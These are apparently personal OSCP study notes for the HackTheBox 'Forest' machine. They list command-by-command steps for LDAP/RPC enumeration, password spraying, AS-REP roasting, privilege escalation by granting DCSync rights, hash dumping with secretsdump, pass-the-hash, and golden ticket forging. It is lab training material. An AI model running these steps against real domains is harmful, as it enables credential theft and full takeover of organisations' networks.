OSCP Notes

Forest HTB (ippsec) -followthrough

  • try to expose SMB
  • try to expose host names with nslookup
    • the actual ip
  • ldapsearch IP -x -s base namingcontexts (find domain info)
  • ldapsearch IP -x -s -b "DC=htb,DC=local" '(objectClass=Person)' FILTERS(what you want to see)
    • for the filter part you can put whatever like sAMAccountName
    • we can do user instead of the person, too
we can do passwordspray once we get the account names.
awk '{print $2}' to print the second part.
make a user list with the valid users (no need to include guest account that ends with $ -- valid users are generally short)
Let's crack them with password!
password list should be short.
Months,Spring, Summer, Winter, Autmn, Fall, Password, Password123, [email protected], Secret
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done
  • this adds year at the end of each word.
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules
This will mutate the passwords and create a new passwordlist
  • add a ! at the end of each word
  • for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done
Another technique
  • hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules -r /usr/share/hashcat/rules/toggles1.rule | sort -u
    • this capitalize different letters | awk 'length ($0) > 8'
Dump password policy
  • crackmapexec smb IP --pass-pol
  • crackmapesex smb IP --pass-pol -u '' -p '' (null authentication attempt)
  • enum4linux
Manual way to look up password policy
if it's showing something like below, it's doing rpc
do rpcclient -U '' IP
and login:
  • enumdom
  • enumdomusers
  • queryusergroups 0x47b (rid)
  • querygroup grouprid to see what kind of domain it is
  • queryuser rid to see password policies
Crack pass
crackmapexec smb IP -u userlist.out -p pwlist.out
Impacket GetNPUsers -dc-ip IP -request 'htb.local/' -format hashcat
looks for account that doesn't require kerbero authentication and dump the hashes.
and crack the output
crackmapexec smb IP -u svc-alfresco -p s3rvice --shares
shows shares
Use evill-winrm
./evil-winrm.rb -u user -p pass -i IP
---> this should get you to the service level shell

Priv Esc

On Kali:
  • download the zip file and the bloodhound application file separately.
  • After downloading, unzip the application file.
  • Download neo4j
neo4j console -> set a new password (default is neo4j) by visiting the localhost:PORT
  • Now execute the Bloodhound with ./Bloodhound --no-sandbox and logiin
On the victim's machine, upload or use the mounted drive to run the SharpHound.exe
./SharpHound.exe -c all
On kali,
  • drop the bloodhound zip file onto the browser which should start processing
On the search bar, type in the user that you already know and mark it as owned
-> show paths from owned principles -> shows a map
If you see an account operation group, they can create users
On victim's,
net user gori gorigori(pass) /add /domain
this should create an account.
net group "Exchange Windows Permissions" /add gori
net group "Exchange Windows Permissions" will verify that the user has been added.
On bloodhound, click the link "WriteDacl" > Abuseinfo
Add-DomainObjectAcl -Credentials $cred -TargetIdentity testlab.local -Rights DCSync
This is a powerview command .
Download the dev version of the powersploit with the -b dev on git clone
copy the powerview.ps1 over to the victim's machine.
$pass= convertto-securestring 'gorigori' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTBl\gori', $pass)
Add-DomainObjectAcl -Credentials $cred -TargetIdentity "DC=htb, DC=local" -PrincipalIdentity gori -Rights DCSync
Then on kali,
use impacket's secretsdump.py htb/gori:[email protected]
grab the last :HASH: part for the admin account

Crack the pass

crackmapexec smb IP -u administrator -H HASH
psexec.py htb.local/Administrator:[email protected]
This should get you a root shell.

Another way to crack

NTLM password cracking:

cat hash.out | grep ::: | awk -F: '{print $1":"$4}'
and do
hashcat --user -m 1000 new_hashes.out rockyou.txt -r rules/InsidePro-PasswordsPro.rule
  • --user will recognize the format "user:hash"
  • --show will show users

Golden Ticket method

copy the krbtgt hash.
On the victim's machine, run the following command to get the -domain-sid
Get-ADDomain htb.local
Golden ticket
With Impacket examples:
# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# To generate the TGT with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
#username can be anything.
  • ipaddress address should not be used for the remote_hostname. Always add the host name to the hosts file.
if it says the time is wrong, we have to change our time --- nmap shows clockstew.
date -s TIME
to change time